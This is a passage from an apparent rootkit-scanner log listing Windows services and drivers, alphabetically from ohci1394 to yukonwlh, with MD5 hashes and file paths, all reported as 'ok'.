14:26:46.0030 1440 ohci1394 - ok
14:26:46.0077 1440 [ 0C8E8E61AD1EB0B250B846712C917506 ] p2pimsvc C:\Windows\system32\p2psvc.dll
14:26:46.0118 1440 p2pimsvc - ok
14:26:46.0131 1440 [ 0C8E8E61AD1EB0B250B846712C917506 ] p2psvc C:\Windows\system32\p2psvc.dll
14:26:46.0137 1440 p2psvc - ok
14:26:46.0176 1440 [ 0FA9B5055484649D63C303FE404E5F4D ] Parport C:\Windows\system32\drivers\parport.sys
14:26:46.0195 1440 Parport - ok
14:26:46.0233 1440 [ B9C2B89F08670E159F7181891E449CD9 ] partmgr C:\Windows\system32\drivers\partmgr.sys
14:26:46.0255 1440 partmgr - ok
14:26:46.0277 1440 [ 4F9A6A8A31413180D0FCB279AD5D8112 ] Parvdm C:\Windows\system32\drivers\parvdm.sys
14:26:46.0300 1440 Parvdm - ok
14:26:46.0328 1440 [ C6276AD11F4BB49B58AA1ED88537F14A ] PcaSvc C:\Windows\System32\pcasvc.dll
14:26:46.0330 1440 PcaSvc - ok
14:26:46.0360 1440 [ 941DC1D19E7E8620F40BBC206981EFDB ] pci C:\Windows\system32\drivers\pci.sys
14:26:46.0392 1440 pci - ok
14:26:46.0430 1440 [ 3B1901E401473E03EB8C874271E50C26 ] pciide C:\Windows\system32\drivers\pciide.sys
14:26:46.0448 1440 pciide - ok
14:26:46.0477 1440 [ E6F3FB1B86AA519E7698AD05E58B04E5 ] pcmcia C:\Windows\system32\drivers\pcmcia.sys
14:26:46.0507 1440 pcmcia - ok
14:26:46.0575 1440 [ 6349F6ED9C623B44B52EA3C63C831A92 ] PEAUTH C:\Windows\system32\drivers\peauth.sys
14:26:46.0648 1440 PEAUTH - ok
14:26:46.0743 1440 [ B1689DF169143F57053F795390C99DB3 ] pla C:\Windows\system32\pla.dll
14:26:46.0780 1440 pla - ok
14:26:46.0809 1440 [ C5E7F8A996EC0A82D508FD9064A5569E ] PlugPlay C:\Windows\system32\umpnpmgr.dll
14:26:46.0817 1440 PlugPlay - ok
14:26:46.0845 1440 [ 0C8E8E61AD1EB0B250B846712C917506 ] PNRPAutoReg C:\Windows\system32\p2psvc.dll
14:26:46.0856 1440 PNRPAutoReg - ok
14:26:46.0875 1440 [ 0C8E8E61AD1EB0B250B846712C917506 ] PNRPsvc C:\Windows\system32\p2psvc.dll
14:26:46.0885 1440 PNRPsvc - ok
14:26:46.0917 1440 [ D0494460421A03CD5225CCA0059AA146 ] PolicyAgent C:\Windows\System32\ipsecsvc.dll
14:26:46.0925 1440 PolicyAgent - ok
14:26:46.0954 1440 [ ECFFFAEC0C1ECD8DBC77F39070EA1DB1 ] PptpMiniport C:\Windows\system32\DRIVERS\raspptp.sys
14:26:46.0999 1440 PptpMiniport - ok
14:26:47.0030 1440 [ 0E3CEF5D28B40CF273281D620C50700A ] Processor C:\Windows\system32\drivers\processr.sys
14:26:47.0046 1440 Processor - ok
14:26:47.0087 1440 [ 0508FAA222D28835310B7BFCA7A77346 ] ProfSvc C:\Windows\system32\profsvc.dll
14:26:47.0087 1440 ProfSvc - ok
14:26:47.0097 1440 [ A3E186B4B935905B829219502557314E ] ProtectedStorage C:\Windows\system32\lsass.exe
14:26:47.0097 1440 ProtectedStorage - ok
14:26:47.0127 1440 [ 99514FAA8DF93D34B5589187DB3AA0BA ] PSched C:\Windows\system32\DRIVERS\pacer.sys
14:26:47.0137 1440 PSched - ok
14:26:47.0197 1440 [ CCDAC889326317792480C0A67156A1EC ] ql2300 C:\Windows\system32\drivers\ql2300.sys
14:26:47.0257 1440 ql2300 - ok
14:26:47.0287 1440 [ 81A7E5C076E59995D54BC1ED3A16E60B ] ql40xx C:\Windows\system32\drivers\ql40xx.sys
14:26:47.0317 1440 ql40xx - ok
14:26:47.0347 1440 [ E9ECAE663F47E6CB43962D18AB18890F ] QWAVE C:\Windows\system32\qwave.dll
14:26:47.0387 1440 QWAVE - ok
14:26:47.0417 1440 [ 9F5E0E1926014D17486901C88ECA2DB7 ] QWAVEdrv C:\Windows\system32\drivers\qwavedrv.sys
14:26:47.0437 1440 QWAVEdrv - ok
14:26:47.0467 1440 [ 147D7F9C556D259924351FEB0DE606C3 ] RasAcd C:\Windows\system32\DRIVERS\rasacd.sys
14:26:47.0487 1440 RasAcd - ok
14:26:47.0517 1440 [ F6A452EB4CEADBB51C9E0EE6B3ECEF0F ] RasAuto C:\Windows\System32\rasauto.dll
14:26:47.0547 1440 RasAuto - ok
14:26:47.0587 1440 [ A214ADBAF4CB47DD2728859EF31F26B0 ] Rasl2tp C:\Windows\system32\DRIVERS\rasl2tp.sys
14:26:47.0607 1440 Rasl2tp - ok
14:26:47.0647 1440 [ 75D47445D70CA6F9F894B032FBC64FCF ] RasMan C:\Windows\System32\rasmans.dll
14:26:47.0647 1440 RasMan - ok
14:26:47.0687 1440 [ 509A98DD18AF4375E1FC40BC175F1DEF ] RasPppoe C:\Windows\system32\DRIVERS\raspppoe.sys
14:26:47.0707 1440 RasPppoe - ok
14:26:47.0717 1440 [ 2005F4A1E05FA09389AC85840F0A9E4D ] RasSstp C:\Windows\system32\DRIVERS\rassstp.sys
14:26:47.0717 1440 RasSstp - ok
14:26:47.0767 1440 [ B14C9D5B9ADD2F84F70570BBBFAA7935 ] rdbss C:\Windows\system32\DRIVERS\rdbss.sys
14:26:47.0797 1440 rdbss - ok
14:26:47.0817 1440 [ 89E59BE9A564262A3FB6C4F4F1CD9899 ] RDPCDD C:\Windows\system32\DRIVERS\RDPCDD.sys
14:26:47.0827 1440 RDPCDD - ok
14:26:47.0857 1440 [ E8BD98D46F2ED77132BA927FCCB47D8B ] rdpdr C:\Windows\system32\drivers\rdpdr.sys
14:26:47.0887 1440 rdpdr - ok
14:26:47.0897 1440 [ 9D91FE5286F748862ECFFA05F8A0710C ] RDPENCDD C:\Windows\system32\drivers\rdpencdd.sys
14:26:47.0967 1440 RDPENCDD - ok
14:26:48.0017 1440 [ C127EBD5AFAB31524662C48DFCEB773A ] RDPWD C:\Windows\system32\drivers\RDPWD.sys
14:26:48.0127 1440 RDPWD - ok
14:26:48.0237 1440 [ BCDD6B4804D06B1F7EBF29E53A57ECE9 ] RemoteAccess C:\Windows\System32\mprdim.dll
14:26:48.0277 1440 RemoteAccess - ok
14:26:48.0327 1440 [ 9E6894EA18DAFF37B63E1005F83AE4AB ] RemoteRegistry C:\Windows\system32\regsvc.dll
14:26:48.0377 1440 RemoteRegistry - ok
14:26:48.0427 1440 [ 6482707F9F4DA0ECBAB43B2E0398A101 ] RFCOMM C:\Windows\system32\DRIVERS\rfcomm.sys
14:26:48.0487 1440 RFCOMM - ok
14:26:48.0527 1440 [ 5123F83CBC4349D065534EEB6BBDC42B ] RpcLocator C:\Windows\system32\locator.exe
14:26:48.0557 1440 RpcLocator - ok
14:26:48.0667 1440 [ 3B5B4D53FEC14F7476CA29A20CC31AC9 ] RpcSs C:\Windows\system32\rpcss.dll
14:26:48.0667 1440 RpcSs - ok
14:26:48.0727 1440 [ 9C508F4074A39E8B4B31D27198146FAD ] rspndr C:\Windows\system32\DRIVERS\rspndr.sys
14:26:48.0767 1440 rspndr - ok
14:26:48.0787 1440 [ A3E186B4B935905B829219502557314E ] SamSs C:\Windows\system32\lsass.exe
14:26:48.0787 1440 SamSs - ok
14:26:48.0827 1440 [ 3CE8F073A557E172B330109436984E30 ] sbp2port C:\Windows\system32\drivers\sbp2port.sys
14:26:48.0867 1440 sbp2port - ok
14:26:48.0917 1440 [ 77B7A11A0C3D78D3386398FBBEA1B632 ] SCardSvr C:\Windows\System32\SCardSvr.dll
14:26:48.0957 1440 SCardSvr - ok
14:26:48.0997 1440 [ 1A58069DB21D05EB2AB58EE5753EBE8D ] Schedule C:\Windows\system32\schedsvc.dll
14:26:49.0017 1440 Schedule - ok
14:26:49.0027 1440 [ 312EC3E37A0A1F2006534913E37B4423 ] SCPolicySvc C:\Windows\System32\certprop.dll
14:26:49.0027 1440 SCPolicySvc - ok
14:26:49.0047 1440 [ 716313D9F6B0529D03F726D5AAF6F191 ] SDRSVC C:\Windows\System32\SDRSVC.dll
14:26:49.0057 1440 SDRSVC - ok
14:26:49.0087 1440 [ 90A3935D05B494A5A39D37E71F09A677 ] secdrv C:\Windows\system32\drivers\secdrv.sys
14:26:49.0107 1440 secdrv - ok
14:26:49.0127 1440 [ FD5199D4D8A521005E4B5EE7FE00FA9B ] seclogon C:\Windows\system32\seclogon.dll
14:26:49.0127 1440 seclogon - ok
14:26:49.0147 1440 [ A9BBAB5759771E523F55563D6CBE140F ] SENS C:\Windows\System32\sens.dll
14:26:49.0147 1440 SENS - ok
14:26:49.0157 1440 [ 68E44E331D46F0FB38F0863A84CD1A31 ] Serenum C:\Windows\system32\drivers\serenum.sys
14:26:49.0177 1440 Serenum - ok
14:26:49.0207 1440 [ C70D69A918B178D3C3B06339B40C2E1B ] Serial C:\Windows\system32\drivers\serial.sys
14:26:49.0207 1440 Serial - ok
14:26:49.0227 1440 [ 8AF3D28A879BF75DB53A0EE7A4289624 ] sermouse C:\Windows\system32\drivers\sermouse.sys
14:26:49.0247 1440 sermouse - ok
14:26:49.0287 1440 [ D2193326F729B163125610DBF3E17D57 ] SessionEnv C:\Windows\system32\sessenv.dll
14:26:49.0287 1440 SessionEnv - ok
14:26:49.0317 1440 [ 103B79418DA647736EE95645F305F68A ] sffdisk C:\Windows\system32\drivers\sffdisk.sys
14:26:49.0337 1440 sffdisk - ok
14:26:49.0357 1440 [ 8FD08A310645FE872EEEC6E08C6BF3EE ] sffp_mmc C:\Windows\system32\drivers\sffp_mmc.sys
14:26:49.0377 1440 sffp_mmc - ok
14:26:49.0397 1440 [ 9CFA05FCFCB7124E69CFC812B72F9614 ] sffp_sd C:\Windows\system32\drivers\sffp_sd.sys
14:26:49.0427 1440 sffp_sd - ok
14:26:49.0447 1440 [ 46ED8E91793B2E6F848015445A0AC188 ] sfloppy C:\Windows\system32\drivers\sfloppy.sys
14:26:49.0447 1440 sfloppy - ok
14:26:49.0467 1440 [ E1499BD0FF76B1B2FBBF1AF339D91165 ] SharedAccess C:\Windows\System32\ipnathlp.dll
14:26:49.0487 1440 SharedAccess - ok
14:26:49.0507 1440 [ C7230FBEE14437716701C15BE02C27B8 ] ShellHWDetection C:\Windows\System32\shsvcs.dll
14:26:49.0507 1440 ShellHWDetection - ok
14:26:49.0547 1440 [ D2A595D6EEBEEAF4334F8E50EFBC9931 ] sisagp C:\Windows\system32\drivers\sisagp.sys
14:26:49.0577 1440 sisagp - ok
14:26:49.0587 1440 [ CEDD6F4E7D84E9F98B34B3FE988373AA ] SiSRaid2 C:\Windows\system32\drivers\sisraid2.sys
14:26:49.0617 1440 SiSRaid2 - ok
14:26:49.0637 1440 [ DF843C528C4F69D12CE41CE462E973A7 ] SiSRaid4 C:\Windows\system32\drivers\sisraid4.sys
14:26:49.0667 1440 SiSRaid4 - ok
14:26:49.0777 1440 [ 862BB4CBC05D80C5B45BE430E5EF872F ] slsvc C:\Windows\system32\SLsvc.exe
14:26:50.0271 1440 slsvc - ok
14:26:50.0365 1440 [ 6EDC422215CD78AA8A9CDE6B30ABBD35 ] SLUINotify C:\Windows\system32\SLUINotify.dll
14:26:50.0424 1440 SLUINotify - ok
14:26:50.0562 1440 [ 7B75299A4D201D6A6533603D6914AB04 ] Smb C:\Windows\system32\DRIVERS\smb.sys
14:26:50.0624 1440 Smb - ok
14:26:50.0706 1440 [ 2A146A055B4401C16EE62D18B8E2A032 ] SNMPTRAP C:\Windows\System32\snmptrap.exe
14:26:50.0710 1440 SNMPTRAP - ok
14:26:50.0937 1440 [ 50660E6B082A7BF86751A003C3BB5210 ] SNP2UVC C:\Windows\system32\DRIVERS\snp2uvc.sys
14:26:51.0372 1440 SNP2UVC - ok
14:26:51.0422 1440 [ 7AEBDEEF071FE28B0EEF2CDD69102BFF ] spldr C:\Windows\system32\drivers\spldr.sys
14:26:51.0445 1440 spldr - ok
14:26:51.0473 1440 [ 8554097E5136C3BF9F69FE578A1B35F4 ] Spooler C:\Windows\System32\spoolsv.exe
14:26:51.0477 1440 Spooler - ok
14:26:51.0532 1440 [ 41987F9FC0E61ADF54F581E15029AD91 ] srv C:\Windows\system32\DRIVERS\srv.sys
14:26:51.0536 1440 srv - ok
14:26:51.0570 1440 [ FF33AFF99564B1AA534F58868CBE41EF ] srv2 C:\Windows\system32\DRIVERS\srv2.sys
14:26:51.0613 1440 srv2 - ok
14:26:51.0645 1440 [ 7605C0E1D01A08F3ECD743F38B834A44 ] srvnet C:\Windows\system32\DRIVERS\srvnet.sys
14:26:51.0733 1440 srvnet - ok
14:26:51.0802 1440 [ 03D50B37234967433A5EA5BA72BC0B62 ] SSDPSRV C:\Windows\System32\ssdpsrv.dll
14:26:51.0806 1440 SSDPSRV - ok
14:26:51.0828 1440 [ A36EE93698802CD899F98BFD553D8185 ] ssmdrv C:\Windows\system32\DRIVERS\ssmdrv.sys
14:26:51.0884 1440 ssmdrv - ok
14:26:51.0974 1440 [ 6F1A32E7B7B30F004D9A20AFADB14944 ] SstpSvc C:\Windows\system32\sstpsvc.dll
14:26:51.0977 1440 SstpSvc - ok
14:26:52.0217 1440 [ 5DE7D67E49B88F5F07F3E53C4B92A352 ] stisvc C:\Windows\System32\wiaservc.dll
14:26:52.0230 1440 stisvc - ok
14:26:52.0243 1440 [ 7BA58ECF0C0A9A69D44B3DCA62BECF56 ] swenum C:\Windows\system32\DRIVERS\swenum.sys
14:26:52.0253 1440 swenum - ok
14:26:52.0294 1440 [ F21FD248040681CCA1FB6C9A03AAA93D ] swprv C:\Windows\System32\swprv.dll
14:26:52.0310 1440 swprv - ok
14:26:52.0361 1440 [ 192AA3AC01DF071B541094F251DEED10 ] Symc8xx C:\Windows\system32\drivers\symc8xx.sys
14:26:52.0380 1440 Symc8xx - ok
14:26:52.0403 1440 [ 8C8EB8C76736EBAF3B13B633B2E64125 ] Sym_hi C:\Windows\system32\drivers\sym_hi.sys
14:26:52.0427 1440 Sym_hi - ok
14:26:52.0454 1440 [ 8072AF52B5FD103BBBA387A1E49F62CB ] Sym_u3 C:\Windows\system32\drivers\sym_u3.sys
14:26:52.0486 1440 Sym_u3 - ok
14:26:52.0632 1440 [ 0E8676FB3BB95AA40FDF7A4A31018C8B ] SynTP C:\Windows\system32\DRIVERS\SynTP.sys
14:26:53.0001 1440 SynTP - ok
14:26:53.0142 1440 [ 9A51B04E9886AA4EE90093586B0BA88D ] SysMain C:\Windows\system32\sysmain.dll
14:26:53.0150 1440 SysMain - ok
14:26:53.0205 1440 [ 2DCA225EAE15F42C0933E998EE0231C3 ] TabletInputService C:\Windows\System32\TabSvc.dll
14:26:53.0211 1440 TabletInputService - ok
14:26:53.0271 1440 [ FD90A16CEB10D4FDAA00AAF39B8FF58F ] taphss C:\Windows\system32\DRIVERS\taphss.sys
14:26:53.0386 1440 taphss - ok
14:26:53.0464 1440 [ D7673E4B38CE21EE54C59EEEB65E2483 ] TapiSrv C:\Windows\System32\tapisrv.dll
14:26:53.0483 1440 TapiSrv - ok
14:26:53.0539 1440 [ CB05822CD9CC6C688168E113C603DBE7 ] TBS C:\Windows\System32\tbssvc.dll
14:26:53.0542 1440 TBS - ok
14:26:53.0708 1440 [ 74E2D020C47BB2B2FCCBA29A518A7EB4 ] Tcpip C:\Windows\system32\drivers\tcpip.sys
14:26:54.0016 1440 Tcpip - ok
14:26:54.0140 1440 [ 74E2D020C47BB2B2FCCBA29A518A7EB4 ] Tcpip6 C:\Windows\system32\DRIVERS\tcpip.sys
14:26:54.0148 1440 Tcpip6 - ok
14:26:54.0193 1440 [ 608C345A255D82A6289C2D468EB41FD7 ] tcpipreg C:\Windows\system32\drivers\tcpipreg.sys
14:26:54.0224 1440 tcpipreg - ok
14:26:54.0268 1440 [ 5DCF5E267BE67A1AE926F2DF77FBCC56 ] TDPIPE C:\Windows\system32\drivers\tdpipe.sys
14:26:54.0277 1440 TDPIPE - ok
14:26:54.0320 1440 [ 389C63E32B3CEFED425B61ED92D3F021 ] TDTCP C:\Windows\system32\drivers\tdtcp.sys
14:26:54.0351 1440 TDTCP - ok
14:26:54.0383 1440 [ 76B06EB8A01FC8624D699E7045303E54 ] tdx C:\Windows\system32\DRIVERS\tdx.sys
14:26:54.0414 1440 tdx - ok
14:26:54.0656 1440 [ 9F3E7CABE86BBDECA009DE291DB6D9E2 ] TeamViewer8 C:\Program Files\TeamViewer\Version8\TeamViewer_Service.exe
14:26:54.0726 1440 TeamViewer8 - ok
14:26:54.0746 1440 [ 3CAD38910468EAB9A6479E2F01DB43C7 ] TermDD C:\Windows\system32\DRIVERS\termdd.sys
14:26:54.0786 1440 TermDD - ok
14:26:54.0816 1440 [ BB95DA09BEF6E7A131BFF3BA5032090D ] TermService C:\Windows\System32\termsrv.dll
14:26:54.0826 1440 TermService - ok
14:26:54.0836 1440 [ C7230FBEE14437716701C15BE02C27B8 ] Themes C:\Windows\system32\shsvcs.dll
14:26:54.0846 1440 Themes - ok
14:26:54.0856 1440 [ 1076FFCFFAAE8385FD62DFCB25AC4708 ] THREADORDER C:\Windows\system32\mmcss.dll
14:26:54.0856 1440 THREADORDER - ok
14:26:54.0886 1440 [ EC74E77D0EB004BD3A809B5F8FB8C2CE ] TrkWks C:\Windows\System32\trkwks.dll
14:26:54.0886 1440 TrkWks - ok
14:26:54.0926 1440 [ 97D9D6A04E3AD9B6C626B9931DB78DBA ] TrustedInstaller C:\Windows\servicing\TrustedInstaller.exe
14:26:54.0926 1440 TrustedInstaller - ok
14:26:54.0976 1440 [ DCF0F056A2E4F52287264F5AB29CF206 ] tssecsrv C:\Windows\system32\DRIVERS\tssecsrv.sys
14:26:54.0993 1440 tssecsrv - ok
14:26:55.0018 1440 [ CAECC0120AC49E3D2F758B9169872D38 ] tunmp C:\Windows\system32\DRIVERS\tunmp.sys
14:26:55.0039 1440 tunmp - ok
14:26:55.0062 1440 [ 300DB877AC094FEAB0BE7688C3454A9C ] tunnel C:\Windows\system32\DRIVERS\tunnel.sys
14:26:55.0091 1440 tunnel - ok
14:26:55.0121 1440 [ C3ADE15414120033A36C0F293D4A4121 ] uagp35 C:\Windows\system32\drivers\uagp35.sys
14:26:55.0145 1440 uagp35 - ok
14:26:55.0177 1440 [ D9728AF68C4C7693CB100B8441CBDEC6 ] udfs C:\Windows\system32\DRIVERS\udfs.sys
14:26:55.0206 1440 udfs - ok
14:26:55.0232 1440 [ ECEF404F62863755951E09C802C94AD5 ] UI0Detect C:\Windows\system32\UI0Detect.exe
14:26:55.0264 1440 UI0Detect - ok
14:26:55.0299 1440 [ 75E6890EBFCE0841D3291B02E7A8BDB0 ] uliagpkx C:\Windows\system32\drivers\uliagpkx.sys
14:26:55.0322 1440 uliagpkx - ok
14:26:55.0350 1440 [ 3CD4EA35A6221B85DCC25DAA46313F8D ] uliahci C:\Windows\system32\drivers\uliahci.sys
14:26:55.0376 1440 uliahci - ok
14:26:55.0399 1440 [ 8514D0E5CD0534467C5FC61BE94A569F ] UlSata C:\Windows\system32\drivers\ulsata.sys
14:26:55.0442 1440 UlSata - ok
14:26:55.0472 1440 [ 38C3C6E62B157A6BC46594FADA45C62B ] ulsata2 C:\Windows\system32\drivers\ulsata2.sys
14:26:55.0487 1440 ulsata2 - ok
14:26:55.0509 1440 [ 32CFF9F809AE9AED85464492BF3E32D2 ] umbus C:\Windows\system32\DRIVERS\umbus.sys
14:26:55.0529 1440 umbus - ok
14:26:55.0564 1440 [ 68308183F4AE0BE7BF8ECD07CB297999 ] upnphost C:\Windows\System32\upnphost.dll
14:26:55.0570 1440 upnphost - ok
14:26:55.0600 1440 [ EAFE1E00739AFE6C51487A050E772E17 ] USBAAPL C:\Windows\system32\Drivers\usbaapl.sys
14:26:55.0626 1440 USBAAPL - ok
14:26:55.0678 1440 [ CAF811AE4C147FFCD5B51750C7F09142 ] usbccgp C:\Windows\system32\DRIVERS\usbccgp.sys
14:26:55.0705 1440 usbccgp - ok
14:26:55.0744 1440 [ E9476E6C486E76BC4898074768FB7131 ] usbcir C:\Windows\system32\drivers\usbcir.sys
14:26:55.0767 1440 usbcir - ok
14:26:55.0847 1440 [ 79E96C23A97CE7B8F14D310DA2DB0C9B ] usbehci C:\Windows\system32\DRIVERS\usbehci.sys
14:26:55.0927 1440 usbehci - ok
14:26:55.0984 1440 [ 4673BBCB006AF60E7ABDDBE7A130BA42 ] usbhub C:\Windows\system32\DRIVERS\usbhub.sys
14:26:56.0067 1440 usbhub - ok
14:26:56.0125 1440 [ 38DBC7DD6CC5A72011F187425384388B ] usbohci C:\Windows\system32\drivers\usbohci.sys
14:26:56.0151 1440 usbohci - ok
14:26:56.0185 1440 [ E75C4B5269091D15A2E7DC0B6D35F2F5 ] usbprint C:\Windows\system32\DRIVERS\usbprint.sys
14:26:56.0230 1440 usbprint - ok
14:26:56.0285 1440 [ A508C9BD8724980512136B039BBA65E9 ] usbscan C:\Windows\system32\DRIVERS\usbscan.sys
14:26:56.0315 1440 usbscan - ok
14:26:56.0349 1440 [ BE3DA31C191BC222D9AD503C5224F2AD ] USBSTOR C:\Windows\system32\DRIVERS\USBSTOR.SYS
14:26:56.0375 1440 USBSTOR - ok
14:26:56.0410 1440 [ 814D653EFC4D48BE3B04A307ECEFF56F ] usbuhci C:\Windows\system32\DRIVERS\usbuhci.sys
14:26:56.0428 1440 usbuhci - ok
14:26:56.0530 1440 [ E67998E8F14CB0627A769F6530BCB352 ] usbvideo C:\Windows\system32\Drivers\usbvideo.sys
14:26:56.0546 1440 usbvideo - ok
14:26:56.0587 1440 [ 1509E705F3AC1D474C92454A5C2DD81F ] UxSms C:\Windows\System32\uxsms.dll
14:26:56.0587 1440 UxSms - ok
14:26:56.0647 1440 [ CD88D1B7776DC17A119049742EC07EB4 ] vds C:\Windows\System32\vds.exe
14:26:56.0687 1440 vds - ok
14:26:56.0777 1440 [ 7D92BE0028ECDEDEC74617009084B5EF ] vga C:\Windows\system32\DRIVERS\vgapnp.sys
14:26:56.0797 1440 vga - ok
14:26:56.0827 1440 [ 2E93AC0A1D8C79D019DB6C51F036636C ] VgaSave C:\Windows\System32\drivers\vga.sys
14:26:56.0857 1440 VgaSave - ok
14:26:56.0877 1440 [ 045D9961E591CF0674A920B6BA3BA5CB ] viaagp C:\Windows\system32\drivers\viaagp.sys
14:26:56.0887 1440 viaagp - ok
14:26:56.0907 1440 [ 56A4DE5F02F2E88182B0981119B4DD98 ] ViaC7 C:\Windows\system32\drivers\viac7.sys
14:26:56.0917 1440 ViaC7 - ok
14:26:56.0927 1440 [ FD2E3175FCADA350C7AB4521DCA187EC ] viaide C:\Windows\system32\drivers\viaide.sys
14:26:56.0957 1440 viaide - ok
14:26:56.0987 1440 [ 69503668AC66C77C6CD7AF86FBDF8C43 ] volmgr C:\Windows\system32\drivers\volmgr.sys
14:26:56.0997 1440 volmgr - ok
14:26:57.0067 1440 [ 23E41B834759917BFD6B9A0D625D0C28 ] volmgrx C:\Windows\system32\drivers\volmgrx.sys
14:26:57.0097 1440 volmgrx - ok
14:26:57.0137 1440 [ 786DB5771F05EF300390399F626BF30A ] volsnap C:\Windows\system32\drivers\volsnap.sys
14:26:57.0147 1440 volsnap - ok
14:26:57.0177 1440 [ D984439746D42B30FC65A4C3546C6829 ] vsmraid C:\Windows\system32\drivers\vsmraid.sys
14:26:57.0217 1440 vsmraid - ok
14:26:57.0367 1440 [ DB3D19F850C6EB32BDCB9BC0836ACDDB ] VSS C:\Windows\system32\vssvc.exe
14:26:57.0407 1440 VSS - ok
14:26:57.0427 1440 [ 96EA68B9EB310A69C25EBB0282B2B9DE ] W32Time C:\Windows\system32\w32time.dll
14:26:57.0427 1440 W32Time - ok
14:26:57.0457 1440 [ 48DFEE8F1AF7C8235D4E626F0C4FE031 ] WacomPen C:\Windows\system32\drivers\wacompen.sys
14:26:57.0467 1440 WacomPen - ok
14:26:57.0507 1440 [ 55201897378CCA7AF8B5EFD874374A26 ] Wanarp C:\Windows\system32\DRIVERS\wanarp.sys
14:26:57.0527 1440 Wanarp - ok
14:26:57.0537 1440 [ 55201897378CCA7AF8B5EFD874374A26 ] Wanarpv6 C:\Windows\system32\DRIVERS\wanarp.sys
14:26:57.0537 1440 Wanarpv6 - ok
14:26:57.0567 1440 [ A3CD60FD826381B49F03832590E069AF ] wcncsvc C:\Windows\System32\wcncsvc.dll
14:26:57.0607 1440 wcncsvc - ok
14:26:57.0637 1440 [ 11BCB7AFCDD7AADACB5746F544D3A9C7 ] WcsPlugInService C:\Windows\System32\WcsPlugInService.dll
14:26:57.0657 1440 WcsPlugInService - ok
14:26:57.0687 1440 [ AFC5AD65B991C1E205CF25CFDBF7A6F4 ] Wd C:\Windows\system32\drivers\wd.sys
14:26:57.0717 1440 Wd - ok
14:26:57.0777 1440 [ A840213F1ACDCC175B4D1D5AAEAC0D7A ] Wdf01000 C:\Windows\system32\drivers\Wdf01000.sys
14:26:57.0817 1440 Wdf01000 - ok
14:26:57.0847 1440 [ ABFC76B48BB6C96E3338D8943C5D93B5 ] WdiServiceHost C:\Windows\system32\wdi.dll
14:26:57.0847 1440 WdiServiceHost - ok
14:26:57.0867 1440 [ ABFC76B48BB6C96E3338D8943C5D93B5 ] WdiSystemHost C:\Windows\system32\wdi.dll
14:26:57.0867 1440 WdiSystemHost - ok
14:26:57.0907 1440 [ 04C37D8107320312FBAE09926103D5E2 ] WebClient C:\Windows\System32\webclnt.dll
14:26:57.0917 1440 WebClient - ok
14:26:57.0937 1440 [ AE3736E7E8892241C23E4EBBB7453B60 ] Wecsvc C:\Windows\system32\wecsvc.dll
14:26:57.0967 1440 Wecsvc - ok
14:26:57.0988 1440 [ 670FF720071ED741206D69BD995EA453 ] wercplsupport C:\Windows\System32\wercplsupport.dll
14:26:58.0020 1440 wercplsupport - ok
14:26:58.0072 1440 [ 32B88481D3B326DA6DEB07B1D03481E7 ] WerSvc C:\Windows\System32\WerSvc.dll
14:26:58.0076 1440 WerSvc - ok
14:26:58.0167 1440 [ 4575AA12561C5648483403541D0D7F2B ] WinDefend C:\Program Files\Windows Defender\mpsvc.dll
14:26:58.0181 1440 WinDefend - ok
14:26:58.0191 1440 WinHttpAutoProxySvc - ok
14:26:58.0267 1440 [ 6B2A1D0E80110E3D04E6863C6E62FD8A ] Winmgmt C:\Windows\system32\wbem\WMIsvc.dll
14:26:58.0269 1440 Winmgmt - ok
14:26:58.0419 1440 [ 7CFE68BDC065E55AA5E8421607037511 ] WinRM C:\Windows\system32\WsmSvc.dll
14:26:58.0475 1440 WinRM - ok
14:26:58.0544 1440 [ C008405E4FEEB069E30DA1D823910234 ] Wlansvc C:\Windows\System32\wlansvc.dll
14:26:58.0554 1440 Wlansvc - ok
14:26:58.0574 1440 [ 2E7255D172DF0B8283CDFB7B433B864E ] WmiAcpi C:\Windows\system32\DRIVERS\wmiacpi.sys
14:26:58.0575 1440 WmiAcpi - ok
14:26:58.0626 1440 [ 43BE3875207DCB62A85C8C49970B66CC ] wmiApSrv C:\Windows\system32\wbem\WmiApSrv.exe
14:26:58.0640 1440 wmiApSrv - ok
14:26:58.0720 1440 [ 3978704576A121A9204F8CC49A301A9B ] WMPNetworkSvc C:\Program Files\Windows Media Player\wmpnetwk.exe
14:26:58.0739 1440 WMPNetworkSvc - ok
14:26:58.0800 1440 [ CFC5A04558F5070CEE3E3A7809F3FF52 ] WPCSvc C:\Windows\System32\wpcsvc.dll
14:26:58.0837 1440 WPCSvc - ok
14:26:58.0886 1440 [ 801FBDB89D472B3C467EB112A0FC9246 ] WPDBusEnum C:\Windows\system32\wpdbusenum.dll
14:26:58.0890 1440 WPDBusEnum - ok
14:26:58.0941 1440 [ DE9D36F91A4DF3D911626643DEBF11EA ] WpdUsb C:\Windows\system32\DRIVERS\wpdusb.sys
14:26:58.0972 1440 WpdUsb - ok
14:26:59.0276 1440 [ DCF3E3EDF5109EE8BC02FE6E1F045795 ] WPFFontCache_v0400 C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\WPFFontCache_v0400.exe
14:26:59.0327 1440 WPFFontCache_v0400 - ok
14:26:59.0364 1440 [ E3A3CB253C0EC2494D4A61F5E43A389C ] ws2ifsl C:\Windows\system32\drivers\ws2ifsl.sys
14:26:59.0389 1440 ws2ifsl - ok
14:26:59.0435 1440 [ 1CA6C40261DDC0425987980D0CD2AAAB ] wscsvc C:\Windows\System32\wscsvc.dll
14:26:59.0441 1440 wscsvc - ok
14:26:59.0450 1440 WSearch - ok
14:26:59.0579 1440 [ D7E88349BE0F01E4D8D776ADB1F325BF ] WTGService C:\Program Files\Verbindungsassistent\WTGService.exe
14:26:59.0585 1440 WTGService - ok
14:26:59.0666 1440 [ FC3EC24FCE372C89423E015A2AC1A31E ] wuauserv C:\Windows\system32\wuaueng.dll
14:26:59.0736 1440 wuauserv - ok
14:26:59.0784 1440 [ 06E6F32C8D0A3F66D956F57B43A2E070 ] WudfPf C:\Windows\system32\drivers\WudfPf.sys
14:26:59.0825 1440 WudfPf - ok
14:26:59.0871 1440 [ 867C301E8B790040AE9CF6486E8041DF ] WUDFRd C:\Windows\system32\DRIVERS\WUDFRd.sys
14:26:59.0903 1440 WUDFRd - ok
14:26:59.0937 1440 [ FE47B7BC8EA320C2D9B5E5BF6E303765 ] wudfsvc C:\Windows\System32\WUDFSvc.dll
14:26:59.0943 1440 wudfsvc - ok
14:26:59.0999 1440 [ C6CA0CC2F7FCDCFE5B551335BFE6D696 ] yukonwlh C:\Windows\system32\DRIVERS\yk60x86.sys
14:27:00.0015 1440 yukonwlh - ok
14:27:00.0030 1440 ================ Scan global ===============================
